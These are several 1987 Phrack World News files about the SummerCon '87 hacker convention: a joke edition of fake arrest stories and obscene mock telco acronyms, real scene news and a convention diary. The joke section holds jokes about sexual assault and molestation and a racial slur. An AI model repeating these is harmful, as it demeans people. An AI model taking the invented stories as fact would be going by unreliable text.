~~~~~~~~~~~~~~~~~~~~~~~~~
Well, the SummerCon went over well, except when the convention attendees stole
every payphone in the building and placed them in front of Taran King's hotel
room, rang the door, and shouted "Room Service." Needless to say, Taran King
is now in jail until he can pay for all the stolen payphones.
______________________________________________________________________________
Name: Knight Lightning
Phreak/Hack World Shut Down! June 21, 1987
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
It happened yesterday when John Maxfield accompanied by Ralph Meola, Richard
Proctor, Dan Pasquale, Edward P. Nowicki, and several members of the FBI,
Secret Service, National Security Agency, and local baggers 402 literally
invaded SummerCon '87, the annual phreak/hack reunion. It has been reported
that a total of 97 suspects have been placed in custody with crimes linking
them to jay walking, loitering, curfew violation, disturbing the peace, and
belching in excessive amounts.
Details are sketchy but it appears that it all started when a very drunk pair
of twins decided to visit the local McDonald's and demanded a COSMOS Sundae
with passwords on the side. When a very confused McDonald's employee refused,
they became agitated and whipped out a blue box, using it to open the "trunks"
of all the cars in the parking lot and then finally throwing it at an
employee. A mad crowd of people rushed to the Best Western Executive
International Inn and tried to storm the building when the other previously
mentioned uninvited guests arrived.
Final remarks from the twins... "So who wants to discuss CAMA?"
Information provided by F. R. Newsline Services and on the scene reporting by
Broadway Hacker (arrested for attempted prostitution).
______________________________________________________________________________
Name: Thomas Covenant
SummerCon '87 "Laugh Riot"; Numerous Phreaks Still Missing June 25, 1987
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
(St Louis, PP) Authorities are still searching for the nearly 100 missing
telecom enthusiasts who gathered in town over the weekend for a convention.
Apparently the missing parties were sitting around, undergoing the intake of
many assorted consciousness altering chemicals, when a strange young man with
shoulder length hair and wearing a Judas Priest jacket appeared. He forced
them all into a white 1957 Chevy pickup and took off, leaving only Evil Jay
and Thomas Covenant behind. Evil Jay was quoted as saying it was a "laugh
riot." Thomas Covenant had nothing to say as he is in shock from the incident
and currently undergoing treatment at the St. Louis Home for the Terminally
Bewildered.
______________________________________________________________________________
Name: Phantom Phreaker
Computer Enthusiasts Infected With The AIDS Virus June 22, 1987
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>From St. Louis Post Dispatch
They called it "SummerCon," a gathering of "phone phreaks" and computer
hackers who are loosely organized around a network of computer bulletin
boards. However, tragedy struck the meeting when the hacker named Evil Jay
tricked another hacker, Suicidal Nightmare, into entering the room belonging
to Broadway Hacker. Suicidal Nightmare was found in the parking lot with a
torn anus.
As if this wasn't bad enough, Broadway Hacker then went wild and began trying
to molest the smallest hackers there. He could be seen chasing Kango Kid
while screaming about a flaming mailbox and rubbing his genital area.
Other problems arose from the hackers meeting. Several people were arrested
for possession of cannibus and illegal possession of alcohol. The other
charges included:
o Intoxicated Pedestrian
o Disturbing the Peace
o Contributing to the delinquency of a minor
o Failure to yield at stop sign
o No turn signal
o Theft of telephones
o Verbally harassing telephone operators
As you can see, these computer 'hackers' have no morals and decency and should
not be allowed to meet.
(C) Post Dispatch 2050
Written by Jack Meoff
______________________________________________________________________________
Name: Knight Lightning
Phreak World Crippled; SummerCon Causes Despair June 22, 1987
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Today, the phreak world was astounded and dealt a horrifying blow as all the
phreaks who attended SummerCon left with their entire phreak knowledge
literally erased from their minds due to an excess of drinking and other
unknown mind altering substances. It is unknown as to if these effects are
temporary or a life-long destruction.
Anarchy World Takes Charge June 23, 1987
~~~~~~~~~~~~~~~~~~~~~~~~~~
MetalliBashers Inc. have become the new "LOD" of the modem world since all of
the LOD members no longer can even remember what LOD stands for (in fact, no
one can, and forget I mentioned it!). With MBI taking charge, the new wave of
the modem world has turned strictly anarchy, although there are rumors of
various pirating organizations beginning to unload new wares soon.
Investigators Lose Jobs! June 24, 1987
~~~~~~~~~~~~~~~~~~~~~~~~
John Maxfield reportedly lost ALL contracts today when it was discovered that
the phreak/hack community was completely destroyed, thus no one needed
protection from them. He has now taken a job with the local sanitation
management firm to help figure out what to do with all the garbage now that
the phreak community wasn't stealing 1/3 of it anymore.
______________________________________________________________________________
Name: Evil Jay
Suicidal Nightmare - History June 23, 1987
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Suicidal Nightmare met death head on when Evil Jay knocked on his door
pretending to be a lineman checking on his line. Once inside, Jay proceeded
to swing a hand set at him with amazing accuracy. Once dragged outside, Jay
then proceeded to tie Suicidal naked to a tree and call the ever-lovin'
Broadway Hacker over to do his stuff. Jay was last heard pleading insanity.
Suicidal Nightmare remains in intensive care, and Broadway Hacker is happy.
______________________________________________________________________________
That is the last of the news reports, now on with "Those Amazing Acronyms...!"
______________________________________________________________________________
Name: Doom Prophet
FUCK-Facilities Utilization Control Kitchen. A really hot office. They keep
backups of all systems per a LATA, or in special cases, the entire BOC
area, along with user logs and passwords. They use the CUNTLICK system
to interface with SHIT, explained momentarily. They are difficult to
reach as no one knows their number, and anyone calling it has to enter a
special queue dispenser where he enters routing information to reach the
FUCK ACD. The FUCK technicians answer as normal subscribers and you have
to tell them a codeword.
PENIS-Plant Engineering Network Information System. Used by the PMS to deal
with outside plant details and layout maps.
CUNTLICK-Computer Utilities Network In the Control Kitchen. Used to sensor
with SHIT.
SHIT-Supreme Hardware Inventory Totals. Self explanatory.
CRAP-Customer Repair Analysis Service. They use PENIS to supply PMS with
info.
PISS-Primary Intertoll Switching Servicemen. Co-ordinate classes 1 through 4
toll offices and monitor the STP's.
BITCH-Building Installation Table Channel. Used by SHIT technicians to obtain
new switch and office status.
SCAB-Switching Cable Analysis Bureau. They work with PMS for trunk testing
and maintenance. The systems they use are FART and DOPAMINE.
BASTARD-Box Accessible System To Aid Real D00ds. A special in band NPA with
full OSC support for blue boxers to experiment within legally. Only
operating in special areas.
______________________________________________________________________________
Name: Phantom Phreaker
DOGSHIT-Division Operations Group SHIT (see above post). DOGSHIT is like
SHIT, except that DOGSHIT is in a division.
CATPISS-Centralized Automatic Tandem Priorities Interexchange Support System.
Self-explanatory.
BEER-Bell Electrical Engineering Research
COOL-Computerized Operations On Loops
______________________________________________________________________________
Name: Taran King
BOOGER-Bell Operational Office for Generation of ESS Reports. Self
Explanatory.
STAN-Spanish Tacos And Nachos. This support group, Californian based,
maintains food services for all superior employees (all employees).
NATE-Nacho And Taco Emissary. This department secretly interfaces STAN with
the rest of the network due to the STAN group's inability to fit in with
society. **Due to divestiture, NATE and STAN are no longer part of the
network**
IL DUCE-Not an acronym, but the janitorial services department of the network.
PUMPKIN-Peripheral Unit Modulator Phor Kitchen Installations of NATE. This
group is in charge of interfacing kitchen activities through Project
Genesis. See RAPE.
BRRR-RING-The official word for the sound an AT&T phone makes receiving an
incoming call.
BANANA-Basic Analog Network Analog Network Analog (No wonder they went
digital)
RAPE-Red Afro-PUMPKIN Enthusiast. This group, led by Peter, cheers IL DUCE
while he sweeps the floors.
SCOOP-Secondary Command Output Only Procedure. This converts all text to
lower case. It is a function used in most Bell computers along with
LEX.
LEX-Lengthy Explanatory Xlations. This program, found alongside SCOOP,
converts all lowercase text, from SCOOP, into upper case and 40 columns
surrounded by "$"s.
** Warning! Never leave SCOOP and LEX running simultaneously or you will
surely cause L666 to occur. **
L666-The warning message generated by computers indicating endless loops of
conflicting jobs. This also indicates that everything is fucked. See
LOKI.
LOKI-Life Over-Kill Incentive. If you find this error message on your
computer, do not reboot the computer, but be sure to reboot something.
______________________________________________________________________________
Name: The Disk Jockey
SNATCH-Senses Nodes And Traps Code Hackers
TITS-Telephone Involved in Tandem Skipping
PUBIC-Plastered Uniforms Brought Inside CO (An employee infraction)
RAD-Receive Analog Department
DISC-Deadbeats Instinctively Scanning for Carriers
LAP-Local Area Payphone
Or use the codewords that Linemen and Telco employees use....
This Means This
---- ----------
"OHFUCKNIGS" "I'm trapped in a phone booth in a black neighborhood"
"FIDOFUCK" "A customer's pet dog has me trapped up a pole"
"HOMEBONE" "I got laid while doing a customer's installation"
"SNOOZEBOX" "I'm sleeping, but saying I'm fixing little green boxes"
______________________________________________________________________________
This concludes Phrack World News Special Edition. I hope you enjoyed it. If
you have any comments or ideas be sure to get in touch with me or Taran King.
:Knight Lightning
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

345
phrack14/8.txt Normal file
View file

@ -0,0 +1,345 @@
PWN ^*^ PWN ^*^ PWN ^*^ PWN ^*^ PWN ^*^ PWN ^*^ PWN ^*^ PWN ^*^ PWN
^*^ ^*^
PWN ^*^ Phrack World News ^*^ PWN
^*^ Issue XIV ^*^
PWN PWN
^*^ ^*^ Compiled, Written, and Edited ^*^ ^*^
PWN by Knight Lightning PWN
^*^ ^*^
PWN ^*^ PWN ^*^ PWN ^*^ PWN ^*^ PWN ^*^ PWN ^*^ PWN ^*^ PWN ^*^ PWN
On the Home Front/SummerCon '87 April 22, 1987
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Well I'd like to start off this issue with an apology to my readers. Although
I had suspected it for quite some time, I never had any real reason to doubt
the validity of some of the past events detailed in PWN. Please disregard and
ignore these previous stories relating to Oryan QUEST.
Oryan QUEST Busted/415 Gets Hit Again PWN Issue 4-2
Dan Pasquale Seeks New Entertainment PWN Issue 4-3
Oryan QUEST Vs. Dan Pasquale PWN Issue 6-1
Dan Pasquale: Still Hostile Or Ancient History? PWN Issue 7-1
The events regarding Oryan QUEST getting busted or having anything to do with
Dan Pasquale (of the Fremont Police Department) were fictional propaganda
devised and given to me under false pretenses by Oryan QUEST in an attempt to
make himself look like a more experienced phreak and to give him more
publicity and fame in the phreak/hack world.
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Re-Announcing SummerCon! The biggest and best phreak/hack convention ever!
Scheduled for June 19,20 1987 in St. Louis, Missouri and sponsored by
TeleComputist Newsletter, Phrack Inc., and Metal Shop Private.
The festivities will take place at the Executive International Best Western.
There will be two adjoining rooms for guests to sack out in, but you are
welcome to grab your own for space and privacy reasons. The phone number at
the hotel is (314) 731-3800. The name being used to rent the rooms and the
room numbers will remain unannounced until June 19, 1987 where this
information will be placed on the Phrack Inc./Metal Shop Private VMS and the
TeleComputist Information Line. This is to prevent any individuals from
spoiling our fun at the Conference.
We have received quite a few confirmations about people going and have heard
from dozens more who plan to attend. Just based on who we know for sure, this
will be an event to remember for the rest of your lives.
The schedule works sort of like this;
Friday Night - Party and introductions
Saturday Afternoon - The conference will commence in the hotel's banquet hall.
Saturday Night - More partying
Sunday Morning - Everyone cruises home
Guests are asked to please bring some extra cash to help pay for the expense
of this weekend. The front money will be supplied by the sponsors, but any
help will be greatly appreciated. Thanks.
Remember, everyone is welcome to show up. We only ask that you inform us
(myself, Taran King, and/or Forest Ranger) of your plans. This also applies
for speaking at the conference. Please inform us of the topic and how long
you plan to talk.
If you have any further questions please contact Knight Lightning, Taran King,
or Forest Ranger on any bulletin board you can find us, the Phrack Inc./Metal
Shop Private VMS, or call the TeleComputist Information Line at 314-921-7938.
Hope to see you there.
:Knight Lightning
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
*** Special Newsflash ***
^*^ Free Seminar ^*^
When: June 19, 1987 (Morning and Evening)
Where: Sheraton Plaza
900 West Port Plaza
St. Louis, Missouri [Good timing isn't it]
Topics: Advanced Tolls For Protocol Analysis
Using the OSI 7-layer model
Special operator interfaces for: - entry level operators
- protocol technicians
- software engineers
Test T1, SNA, X.25, ISDN, SS#7 with the same tester
Presented by: Atlantic Resource Corporation
Featuring: The INTERVIEW 7000 (R) Series Protocol Analyzers
Discussion: T1 Testing
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Call to register:
Tell them you are (pick one):
- A manger responsible for protocol testing and certification
- An engineer developing OSI 7-layer protocols
- A network manager
- Tech control supervisors
Seating is limited so act quickly.
RSVP Atlantic Research Corp. 800-368-3261
______________________________________________________________________________
Voice Numbers; The Road To Retirement April 5, 1987
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
A rebuttal by Kerrang Khan (Edited for PWN)
Contrary to popular opinion, I actually have a reason for not giving out my
phone number. There has been enough bullshit about this "incident," and I
guess it's time I gave my side of the story.
I don't want anyone to have my phone number. Nobody in the phreak/hack world
needs it. I'm easily reached via boards etc., and if it is that important to
speak with me voice, loops and bridges do exist. It may be more convenient
for you to have my voice number, but I don't think its really worth the risk.
Face it, security people are getting serious about tracking people down.
Unless you move around the country on a monthly basis, you might as well
retire when your phone number gets 'out'. This is not to say everyone whose
number isn't secure is due to be busted but consider the following:
If I have your phone number I also have:
1) Your full name
2) Age
3) Address
4) Criminal record (its public knowledge)
As well as just about anything else that comes to mind. If I can do that,
just think what an investigator can do. As far as Psychic Warlord's policy of
no number, no access goes, well I think it sucks. Anyone here remember "The
Board" in 313? [See Phrack World News Issues 7-1 and 9-1 for information
concerning "THE BOARD" and its aftermath.]
I don't know much about Psychic Warlord and he doesn't need to know much about
me. Its his system, and he can do what he likes with it, but I hope this
isn't the wave of the future. Its a good policy not to leave phone numbers
when calling boards for the first time, and after that, you'll have to use
common sense. That is what it all comes down to, common sense. It seems to
be in short supply these days.
Post Taken From Metal Shop Private
______________________________________________________________________________
Metalland South: Phreak BBS or MetalliFEDS Inc.? June 2, 1987
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Metalland South BBS, at 404-327-2327, was once a fairly well known bulletin
board, where many respected members of the hack/phreak community resided. It
was originally operated by two guys from Metal Communications, Inc., but it
wasn't an MCI club board. The sysop was Iron Man and the co-sysop was Black
Lord. Recently, it has come to the writer's attention, that MS has come under
new management, new policies, and possibly a new idea; Sting.
Somewhere around September-October 1986, Iron Man removed all of the hack/
phreak related subboards as well as all G-philes from the system. He was
apparently worried about getting busted. The last time this reporter spoke
with him, Iron Man said he intended to put the hack/phreak subs back up. Then,
not long after this conversation, the number was changed (The original number
was 404-576-5166).
A person using the alias of The Caretaker was made co-sysop and Iron Man would
not reply to feedback. Everything was handled by The Caretaker [TC from now
on]. TC did not allow any hack/phreak subs, but said he would put them up if
the users would follow STRICT validation procedures.
Strict validation on MS includes:
^*^ Your Real Name
^*^ Your Address
^*^ Your Voice Phone Number
^*^ A Self-Addressed Envelope (in which he will send back with your account
number and password.)
It is obvious to see the ramifications here. A board or sysop gets busted and
then makes a deal to turn over the board to some company or agency. To make
sure that they get who they want, you have to give them all this info, and the
only you can get a password is to let them mail it to you, thus guaranteeing
that if something illegal is posted under that account, you are responsible,
no ifs, ands, or buts.
Now, with the always helpful use of CN/A and various other special procedures,
this reporter and several others have contacted the home of The Caretaker. TC
will not admit to being or to not being The Caretaker. He says he "may be."
Also, while speaking with to Taran King, TC tried to engineer Taran's phone
number three times, using trickery like "let's be friends, what is your phone
number?" TK gave the guy the MSP number, figuring everyone has it. Also TC
is older than 18 (estimated at age 30), and he has three phone lines in his
house. When called, he will not admit to who he is, who runs MS, or who is
the sysop of it. Also, besides begging for you phone number (or demanding he
call you). TC tries to trap you into admitting that you are/have committed
toll fraud. In TK's case, TC tried to get Taran to admit to using other
person's LD service PINs.
The whole aura of mystery around Metalland South seems enough to make it not
worth calling. I urge you never to call this system and never send in
information like that to any system.
Recently I have spoken with Iron Man, and he says "I gave the board to some
guy cause I was sick of running it." Well, he is lying as you will see in the
following transcript:
ME: So, gave it away. To who?
IM: I really don't know him that well. I can give you his first name.
ME: No, that is okay. How old is he?
IM: I don't know. We only talked once and I sent him the software.
ME: Is his name XXXXX, XXXXX (TC's real name)?
IM: I really don't know.
ME: So why did you give the board to someone you don't know?
IM: That was the only chance of keeping it up.
Now, IM do you know him or not? Do you just go throwing the board around? I
thought you said you knew his first name?
^*^ How the heck could he send him the software and not know his name?
(Yeah, I suppose he AE'd a 30 sub system. I can see it now, "To whom
these disks concern."
^*^ Didn't IM seem to know much too little about The Caretaker? I could
understand him not having the guy's last name or address, but not even
knowing his age or where he lives..?
Here are some other things to think about. There is an entire subboard
dedicated to law enforcement and the local police even have an account on the
system under the name CRIMESTOPPERS. I wonder what they would have to say
about codes on the bulletin board. Keep in mind that Metalland South has no
affiliation with Metallibashers, Inc. or Metal Communications, Inc.
Please do not harass the board or its sysop(s), for it serves no purpose. Now
understand that this article is not definitely stating that this board is
directly connected to any law enforcement agency, you can decide this for
yourself.
Article Written By >UNKNOWN USER<
(An Anonymous Phrack Field Reporter)
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Editorial Comments...
~~~~~~~~~~~~~~~~~~~~~
I just wanted to make a few comments about the above article. >UNKNOWN USER<
is the official handle that shall be used by anyone supplying an article, but
wishes for his name not to be mentioned. Its symbolic of the "anonymous user"
function on Metal Shop Private, but it has no direct connection.
We, the editors of Phrack, do not necessarily agree with any of the above
statements and we do encourage those with opposite viewpoints to voice them.
PWN can be used as the forum for those viewpoints, in which I shall voice no
opinion. One more thing, for the record, I did edit the article (with the
author's consent) and will continue to do so to ensure that the original
author's style will not revel their identity.
:Knight Lightning
______________________________________________________________________________
Toll Fraud Trial Sets New Tone June 5, 1987
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>From Network World
by Josh Gonze (Staff Writer)
"May be first jury finding for abuse"
Dallas - The recent jury conviction of a Texas man for the theft and sale of
long-distance access codes may make it easier for long-haul carriers to stem
the tide of toll fraud, which costs the industry an estimated 500 million
dollars a year.
On May 11, 1987, a U.S. District Court jury here [in Dallas] found Dallas
resident Jack Brewer guilty on two counts each of trafficking and possession
of telephone access codes stolen from Texas National Telecommunications Inc.
(TNT), a Texas long-distance carrier. Brewer was charged under a section of
the federal COMPREHENSIVE CRIME CONTROL ACT of 1984.
Sources close to the case said Brewer may be the first person to be convicted
by a jury for toll fraud in the United States. The case is also seen as
important because it indicates growing recognition of toll fraud as a serious
crime.
Brewer was selling the stolen codes, which telephone callers use to access
long-distance circuits of carriers other than AT&T and which those carriers
use for billing, says Terry K. Ray, the Assistant U.S. Attorney who prosecuted
Brewer. TNT officials said use of the stolen codes cost the company $30,000.
Ray said he met with representatives of MCI Communications Corp. last week to
discuss the investigative techniques used to apprehend Brewer and legal
methods used to win the conviction. Brewer will be sentenced by a judge on
June 4 [Yeah the story is a little old, so what], and faces a maximum sentence
of 50 years imprisonment and a $1 million fine.
Toll fraud places a heavy financial burden on MCI and other carriers. Neither
MCI or AT&T would divulge what toll fraud costs them, but U.S. Sprint
Communications Co. said fraudulent use of access codes lowered its
first-quarter 1987 revenue by $19 million.
Brewer was apprehended through a sting operation conducted with the help of
TNT, Southwestern Bell Corp., and the U.S. Secret Service. Southwestern Bell
monitored Brewer's private telephone as he dialed numbers sequentially in a
trial-and-error attempt to obtain active access numbers. The Regional Bell
Holding Company kept a list of the working access codes obtained by Brewer.
Secret Service agents then contacted Brewer, posing as buyers of access
numbers. For $3,000, Brewer sold them a list of 15 numbers, which matched the
list, made by the RBC [Just a tad greedy wasn't he?].
MCI has joined with AT&T, U.S. Sprint and some smaller carriers to form the
Communications Fraud Control Association (CFCA). Rami Abuhamdeh, executive
director of Tysons Corner, a Virginia based group, said there have been
several convictions for toll fraud to date, but those cases were decided by
judges, not juries.
A number of federal and state statues apply in stolen code cases, depending on
how and when the offender defrauds the carrier, Abuhamdeh said. Gaston Sigur,
a lawyer for exchanges, they will faze out code numbers as a way of accessing
long-distance circuits and the level of toll fraud will decline.
Thanks to Jester Sluggo
Typed for PWN by Knight Lightning
______________________________________________________________________________
PWN Quicknotes
~~~~~~~~~~~~~~
A guy who was involved in the California area phreak/pirate organization,
known as The Duplicator, was reported as being killed in a plane crash.
Info by Sir Francis Drake (3/31/87)
------------------------------------------------------------------------------
Doc Holiday was busted for hacking a COSMOS system that was local to him.
Apparently, he dialed direct and the CO most likely had CLID. (4/2/87)
------------------------------------------------------------------------------
KEN is working on version 3.0 of Forum-PC, and there are rumors that it may be
public domain.
------------------------------------------------------------------------------
The Broadway Show BBS, once known as The Radio Station, will be returning to
the 212 NPA. Please contact Broadway Hacker for details.
Information From Broadway Hacker (4/16/87)
------------------------------------------------------------------------------
The rumor going around on Pirate-80 (P-80) that The Lineman is a fed should be
disregarded as The Lineman in question lives in the western part of the nation
and not the famous sysop of Atlantis. Information From The Lineman (4/20/87)
------------------------------------------------------------------------------
Special Notice: As of Phrack XVI, Lucifer 666 will become the author of
Phrack World News. Please send any news, stories or articles to him. I will
be mildly active, but only for special reports or editing.
Knight Lightning - June 5, 1987
______________________________________________________________________________

430
phrack14/9.txt Normal file
View file

@ -0,0 +1,430 @@
PWN ^*^ PWN ^*^ PWN { SummerCon '87 } PWN ^*^ PWN ^*^ PWN
^*^ ^*^
PWN Phrack World News PWN
^*^ Issue XIV/2 ^*^
PWN PWN
^*^ "SummerCon Strikes" ^*^
PWN PWN
^*^ Created, Written, and Edited ^*^
PWN by Knight Lightning PWN
^*^ ^*^
PWN ^*^ PWN ^*^ PWN { SummerCon '87 } PWN ^*^ PWN ^*^ PWN
Welcome to Phrack World News Issue XIV/2. This issue features the exclusive
coverage of SummerCon '87, which took place in St. Louis, Missouri during the
weekend of June 19-21, 1987. Before we get to the bulk of the issue I'd like
to make a note that most of the people who originally claimed that they would
attend did not show up, but this didn't stop us from having a great time. -KL
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
PreCon'87; Tuc Sunday, June 14, 1987
~~~~~~~~~~~~~~
It all started Sunday with the arrival of Tuc from New York. He checked in at
the Executive International Best Western and then later went to visit the
Volkswagon Car exhibit that was currently appearing in St. Louis at the
National Museum Of Transportation.
Taran King and Knight Lightning went to meet Tuc at the hotel unaware that he
had not yet returned from his visit. In the meantime they contacted several
other associates to learn more about other guest's plans of arrival.
Sometime later, Tuc returned to the hotel and fell for a trick pulled by
Knight Lightning and opened the door to his room. From here, PreCon'87 began
and before too long Forest Ranger joined KL and TK. After some more
greetings, Tuc unveiled some of his surprises including a few of his business
cards.
The gathering broke up for a few hours and then regrouped (with the addition
of Cheap Shades) back at the hotel. From there, Forest Ranger led the rest of
us on a trek into Illinois (where they sell alcohol on Sundays). We finally
reached a place called "Fast Eddie's," which served not only as a liquor
store, but as a bar and whorehouse as well. Tuc and FR made their purchase
and the party left for the hotel.
Things remained pretty calm for a while, as we contented ourselves with the
consumption of alcoholic beverages. However, as the night lingered on, we
became restless and loud. It wasn't long until lawn furniture started to
disappear from the hotel's pool patio and this is when we received our first
call from the hotel desk. Soon afterwards, we decided that is was time to eat
and so we sent out for pizza.
Now, although we tried to keep the noise level down, apparently there were
still complaints about us. About 27 minutes after we ordered the pizza, we
received a visit from FR's sister-in-law who brought us a warning. "Get the
hell out of here, the police are on their way!" That's all we needed to hear.
Beer cans were grabbed and we were running for the door, when the hotel
manager and security arrived. We explained that we were leaving and ran down
the hallway. All of the sudden, the Domino's Pizza deliver man shows up. FR
yelled, "Yo, Domino's dude. If you want to get paid, come down here!" There
was no reaction. "Hey, you can deliver it to us here now or to jail, and then
you won't get a tip." He finally got the point.
We grabbed the pizza and headed for a field north of Lambert Field (St. Louis
International Airport). The place was known as the PVA (Private Viewing
Area), but FR informed us that it was really a PFA (Private Fucking Area) as
we noticed when we arrived. However, we were content with eating our pizza
and drinking what was left of the beer. The hotel tried to get Tuc to pay for
the room next door to his because the occupant complained that he didn't get
any sleep. Tuc refused and checked out of the Best Western.
______________________________________________________________________________
PreCon'87; The Omni International Hotel Thursday, June 18, 1987
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This event was hardly as eventful as the previous one, but at least I can fill
in a few blank days. Monday, June 15, 1987, we all saw the movie "The Witches
of Eastwick" and visited North West Plaza. Tuesday, June 16, 1987, I don't
know about because I wasn't there. Wednesday, June 17, 1987, KL, TK, and Tuc
visited Union Station (a luxurious shopping mall) and Tuc picked up souvenirs
for friends back home.
On Thursday we had several guests arrive. Dan The Operator (a real geek)
arrived the earliest and Lucifer 666 and Synthetic Slug arrived a little later
(together). Excluding Cheap Shades at the time, we all converged at Taran's
house where the excited crowd wanted to see Metal Shop Private. Sadly though,
a disassembled shell was all that remained. It wasn't long before we became
bored and left for the hotel. L666 and SS got a room and we killed the rest
of the afternoon at North West Plaza. Afterwards we began to party it up in
the room while watching TV.
Some hours later, we received a call from Bill From RNOC, who was traveling
with Ninja NYC. They were at The Omni International Hotel, downtown and
adjoining to Union Station. The Omni is one the most expensive hotels in the
city and we were all anxious to see it. KL, TK, Dan The Operator, and Tuc
left to go visit Bill and Ninja.
After some misadventures in downtown St. Louis, we arrived at The Omni, which
was a pretty secure building. The elevators required a room key to be
operated. It seems kinda silly though when you consider that the stairs
didn't. So up we went to the third floor where Bill and Ninja were actually
staying.
The rooms at The Omni aren't a whole lot bigger than at Best Western, but they
are quite a bit nicer. They have a TV and a phone in the bathroom. The main
TV is remote control and gives you a billing readout on channel 3. It was
different.
Bill came well prepared for the Con, he had stacks of old and new issues of
2600 Magazine and other propaganda and material. He had several other
interesting items as well including his mysterious notebooks that never left
his sight. However, the most intriguing item that he had with him was his
"bible." "Engineering and Operations in the Bell System" published by AT&T
Bell Laboratories. You can guess what was inside.
So we all talked for a while and then said our goodbyes. The rest of the
evening was for the most part uneventful for us, however, back at Best
Western, Forest Ranger was lighting everything on fire and L666 attempted
(unsuccessfully) to breath fire. I guess he wanted to live up to his name.
SummerCon '87 was about to begin.
______________________________________________________________________________
SummerCon '87; The Beginning Friday Morning, June 19, 1987
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This was the day we had been waiting for. Dan The Operator had shared a room
with Tuc (and he still hasn't paid his share) and Bill From RNOC and Ninja NYC
got a room at the Best Western. Everyone soon gathered in Bill's room and
decided to order pizza.
So we called Pizza Hut, which was just down the road and Bill was very
surprised to discover that they did not have "BIG Igloo Jugs." After
harassing the lady on the phone for a while, Tuc, TK, KL, Shades, and Dan left
to go pick up the pizza. We didn't know Dan was taping us, but that story
will be told later. We messed around at Pizza Hut for a while and then headed
back to the hotel. On the way we had a drag race with some guy who thought he
had a cool car, we won.
It wasn't much longer until Sir Francis Drake arrived bearing surprises. With
him was Dr. Strangelamb (named for Dr. Stranglove, who wasn't too happy about
it), a small stuffed black sheep that makes a "baa" sound when turned over.
Lucifer 666 had a lot of fun at the Con playing with it. SFD also had several
pictures of Oryan QUEST, his car, and Aiken Drum. As far as QUEST's pictures
go, well lets just say that The Executioner's file in Phrack 13 was totally
correct.
While back at the hotel, we had some problems with the management. They
didn't appreciate our attempts at putting up signs in the lobby for SummerCon
people. We worked something out, but on a nearby payphone was perhaps the
strangest person we encountered the whole weekend. It was some weird lady who
barked and scream and kicked the wall, while on the phone. FR was on the
phone next to her and she screamed the word "COCKSUCKER!" He looked at her
and she said "My son-in-law, what an asshole." FR's response was, "Uh yeah, I
think I know some people like that."
We relaxed for a while back in Bill's room (We couldn't stand to stay in
L666's room because of the lingering smell of Synthetic Slug's shoes). As we
became bored, things started to be taken apart. Like the TV, phone, and the
internal speaker system in the room. Throughout all of this, Dan The Operator
had been taping us, but again that will be explained later.
______________________________________________________________________________
SummerCon '87; Lets Party! Friday Afternoon-Evening, June 19, 1987
~~~~~~~~~~~~~~~~~~~~~~~~~~
Lex Luthor and The Leftist arrived at St. Louis Center and called for further
directions. After a long and tiring ordeal, they finally learned how to reach
us. Unfortunately it was rush hour and it would take them some time. We
killed an hour and before long they joined us at Best Western.
After introductions were made, Tuc called Lex out into the hall, and then they
in turn called me, Taran King, and Bill From RNOC as well. The topic of
discussion was Dan The Operator who had hinted earlier that he was going to
get a picture of Lex Luthor, without his knowledge. Less than 3 minutes
later, Ninja NYC followed by Dan The Operator (tape recorder on) sneaked out
the window and tried to reenter the hallway undetected. Ninja had no way of
knowing what we were discussing and thus allowed Dan to come with. Suddenly
we all started to run towards Dan with the intention of beating the hell out
of him. However, he sneaked back into the room through the window.
Once the excitement was over we headed out to dinner. It was mostly
uneventful, except for the conversations on the way. I don't know what went
on in Tuc's car, but in mine we discussed Dan. We split into two groups, one
went to Imo's (a pizza joint) and the rest of us (Bill From RNOC, Ninja NYC,
Lex Luthor, Tuc, The Leftist, and myself) went to a regular sit-down
restaurant. We discussed all sorts of different things both phreak and
non-phreak related, but again the main topic was Dan.
Soon we were joined by the others and we left to go back to Best Western where
we found The Disk Jockey, LOKI, and Control C. These guys came extremely well
prepared. They rented a station wagon somewhere in Michigan and filed it with
a cooler (you can guess what was inside that), tons of magazines, manuals,
electrical equipment, a mobile phone transmitter/receiver, and Control C's IBM
PC, hard disk drive, and modem.
After which, Phantom Phreaker, Doom Prophet, Data Line, Forest Ranger, Bit
Master, and another friend of FR's showed up. SummerCon '87 had begun. It
was just a big party from then on, with the regular hotel party actions. Data
Line had brought lots of TeleComputist back issues to the TeleComputist room
and was distributing them around.
At different times during the night, the elevators were jammed and several
people at the Con decided to go up on the roof. However, many of them also
decided to search for the hotel's PBX system. Somewhere along the way,
Control C, The Leftist, Lucifer 666, Cheap Shades, and I found ourselves
locked inside the staircase of the main building.
The doors only opened from the outside, except at the bottom. Unfortunately
opening the door at the bottom would result in sounding the fire alarm in the
building. This was bad news because that was the last thing we needed. Even
if it wasn't our fault there would be complications. So the five of us split
up and each took a door to bang on. The hotel was mostly empty in these
areas, but I knew that there were people on floor ten. So Lucifer 666 and I
ran up ten flights of stairs and pounded on the door until we finally got a
response, several in fact and many of the people weren't happy (it was after
11 PM). Before too long we had rounded up the rest of our crew and made it
back to the rooms just in time to say good-bye to Phantom Phreaker and Doom
Prophet who were leaving for home (they would return for the Con tomorrow).
